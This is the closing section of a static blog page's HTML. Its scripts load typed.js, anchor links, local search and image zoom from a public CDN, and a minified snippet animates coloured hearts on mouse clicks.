  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "奇技淫巧&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
